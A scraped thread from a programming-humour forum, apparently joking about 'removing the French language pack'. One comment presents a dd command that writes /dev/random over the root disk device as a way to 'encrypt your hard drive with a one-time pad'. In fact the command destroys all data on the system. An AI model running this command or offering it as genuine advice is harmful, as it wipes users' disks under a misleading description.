𝕊𝕚𝕤𝕪𝕡𝕙𝕖𝕒𝕟@programming.dev to Programmer Humor@programming.dev · 2 years agoHow to remove the French language packprogramming.devimagemessage-square11fedilinkarrow-up146arrow-down11
arrow-up145arrow-down1imageHow to remove the French language packprogramming.dev𝕊𝕚𝕤𝕪𝕡𝕙𝕖𝕒𝕟@programming.dev to Programmer Humor@programming.dev · 2 years agomessage-square11fedilink
minus-squareinterolivary@beehaw.orglinkfedilinkarrow-up2·2 years agoYou can also use dd to encrypt your hard drive using a randomized one-time pad: dd if=/dev/random of=$(df / | tail -1 | awk '{print $1}') bs=64k
You can also use
dd
to encrypt your hard drive using a randomized one-time pad:dd if=/dev/random of=$(df / | tail -1 | awk '{print $1}') bs=64k